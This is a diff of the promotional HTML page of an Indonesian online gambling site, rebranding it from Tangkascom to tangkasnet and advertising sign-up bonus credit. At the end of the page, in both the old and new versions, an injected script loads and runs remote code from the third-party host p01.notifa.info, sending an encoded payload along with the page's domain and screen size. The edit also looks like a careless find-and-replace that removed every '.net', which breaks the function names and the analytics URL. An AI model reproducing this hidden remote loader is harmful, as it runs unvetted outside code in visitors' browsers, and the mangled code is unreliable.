--- a/promosi/index.html
+++ b/promosi/index.html
@@ -1,5 +1,5 @@
 
-<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head><meta name="msvalidate.01" content="C5A3A95CC30AE319778E4FE97C58746A" /><meta name="robots" content="index,follow" /><meta name="description" content="Bola Tangkas Online Meja Darat" />
+<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head><meta name="msvalidate.01" content="C5A3A95CC30AE319778E4FE97C58746A" /><meta name="robots" content="index,follow" /><meta name="description" content="Bermain tangkas online di bola tangkas bolatangkas android tangkas asia, berbagai promo menarik termasuk klaim code promo untuk mendapatkan credit pemain baru. Segera daftar dan main!" />
 <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
 
 
@@ -7,7 +7,7 @@
 <link  href="/css/styles.css" rel="stylesheet" type="text/css" /><link  href="/css/base.css" rel="stylesheet" type="text/css" /><!--[if lte IE 6]>
 <link  href="/css/ie6.css" rel="stylesheet" type="text/css" /><![endif]-->
 
-<title>Bola Tangkas Online : Tangkasnet</title><link rel="canonical" href="https://bolatangkasnet.github.io/promosi" />
+<title>Bola tangkasnets Online : tangkasnet</title><link rel="canonical" href="https://bolatangkasnet.github.io/promosi" />
 <script>
   (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
   (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@@ -23,12 +23,12 @@
 
 <div id="container">
 <div id="logo">
-<img src="images/logo.png" width="250" height="20" alt="Logo Tangkascom" /></div>
+<img src="images/logo.png" width="250" height="20" alt="Logo tangkasnet" /></div>
 <div id="nav">
 	<ul>
-		<li id="home" class=""><a href="/" name="Home" title="Tangkascom.net">Home</a></li>
-		<li id="cara" class=""><a href="/bantuan" name="Cara" title="Cara Daftar Tangkascom">Bantuan</a></li>
-		<li id="promosi" class="current"><a href="/promosi" name="Promosi" title="Promosi Tangkascom">Promosi</a></li>
+		<li id="home" class=""><a href="/" name="Home" title="tangkasnet">Home</a></li>
+		<li id="cara" class=""><a href="/bantuan" name="Cara" title="Cara Daftar tangkasnet">Bantuan</a></li>
+		<li id="promosi" class="current"><a href="/promosi" name="Promosi" title="Promosi tangkasnet">Promosi</a></li>
 	</ul>
 <div class="clearfix"></div>
 </div>
@@ -46,7 +46,7 @@
 		<div id="content">
 			<div id="sub_content">
 	<h1>Dapat Poin Rebut Credit</h1>
-	<p>Meningkatkan kualitas permainan Tangkascom.net : <b>Tukar Poin</b> kini lebih menarik dan berkesempatan mendapatkan bonus credit tak terhingga. Kami namakan INFINITI <span class="infinity">&infin;</span> CREDIT.</p>
+	<p>Meningkatkan kualitas permainan tangkasnet : <b>Tukar Poin</b> kini lebih menarik dan berkesempatan mendapatkan bonus credit tak terhingga. Kami namakan INFINITI <span class="infinity">&infin;</span> CREDIT.</p>
 	<div class="game-event">
 		<img src="/images/promo/infinitipoin.jpg">
 		<h2>TAMBAH EXTRA POIN</h2>
@@ -110,7 +110,7 @@
 		<li><a href="/">Home</a></li>
 		<li><a href="/promosi">Promosi</a></li>
 		<li><a href="/bantuan">Bantuan</a></li>
-		<li>Tangkascom (C) 2010 - 2018</li>
+		<li>tangkasnet (C) 2010 - 2018</li>
 	</ul>
 </div>
 </div>
@@ -118,14 +118,14 @@
 
   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-16387091-2']);
-  _gaq.push(['_setDomainName', '.tangkascom.net']);
+  _gaq.push(['_setDomainName', '.tangkasnet']);
   _gaq.push(['_trackPageview']);
 
   (function() {
     var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
-    ga.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'stats.g.doubleclick.net/dc.js';
+    ga.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'stats.g.doubleclick/dc.js';
     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
 
 </script>
-<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2fUXyLF1a9%2fXuunePh22T1E%2bFIiGUWfHDetio63y%2fBOAJnEPvAtOWk8zj4yNbyiDg8Kyb7bTSWwPBX0r2PGTreZ1HOTTXhsqIHvG6Lu0LSXuQKzyiDnDF5WEzQrLZzcILtXoozFrOq7DeDkNiBURDtsf8LCbULdml6cP1IqS7b0AVd3cmg6zi67RMzw%2bls33ff0qOd%2bICtpLab2qzrsZUXXnH1qQGsETIeqwsKJWY29rakse85EgTo8Xz4KhOJk7XEja9LD%2b6ejFOqZGecV7%2bA2RuAcpvmixFo4IhcGxn5iisSZtsr7jUkhdHqHRVjFVtHixCJHBuScB2YUy6yz9W38BNWFM%2fm50nJbYqHDwhIHlhUZtQu53erLN7VW%2b7vmmLGAM3UbywMDRyjMCECBjckcKHtO2VePqyfGxRsISchHuVApFzXnVlRVgltSeD5G0yVN%2fdqdBdit6LFKucExUm3KBZeq8cERngJww9kjcHosUG8l8X67r%2bsoxSl2jodTSju89Cl7MC5nx0u%2bejFlH62E9C218RKPgBk%2bEibrtJ%2fdg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>
+<script type="text/javascript">if (self==top) {functionbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2fUXyLF1a9%2fXuunePh22T1E%2bFIiGUWfHDetio63y%2fBOAJnEPvAtOWk8zj4yNbyiDg8Kyb7bTSWwPBX0r2PGTreZ1HOTTXhsqIHvG6Lu0LSXuQKzyiDnDF5WEzQrLZzcILtXoozFrOq7DeDkNiBURDtsf8LCbULdml6cP1IqS7b0AVd3cmg6zi67RMzw%2bls33ff0qOd%2bICtpLab2qzrsZUXXnH1qQGsETIeqwsKJWY29rakse85EgTo8Xz4KhOJk7XEja9LD%2b6ejFOqZGecV7%2bA2RuAcpvmixFo4IhcGxn5iisSZtsr7jUkhdHqHRVjFVtHixCJHBuScB2YUy6yz9W38BNWFM%2fm50nJbYqHDwhIHlhUZtQu53erLN7VW%2b7vmmLGAM3UbywMDRyjMCECBjckcKHtO2VePqyfGxRsISchHuVApFzXnVlRVgltSeD5G0yVN%2fdqdBdit6LFKucExUm3KBZeq8cERngJww9kjcHosUG8l8X67r%2bsoxSl2jodTSju89Cl7MC5nx0u%2bejFlH62E9C218RKPgBk%2bEibrtJ%2fdg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);bro_cache_analytics(requestCfs, function(){});};</script></body></html>
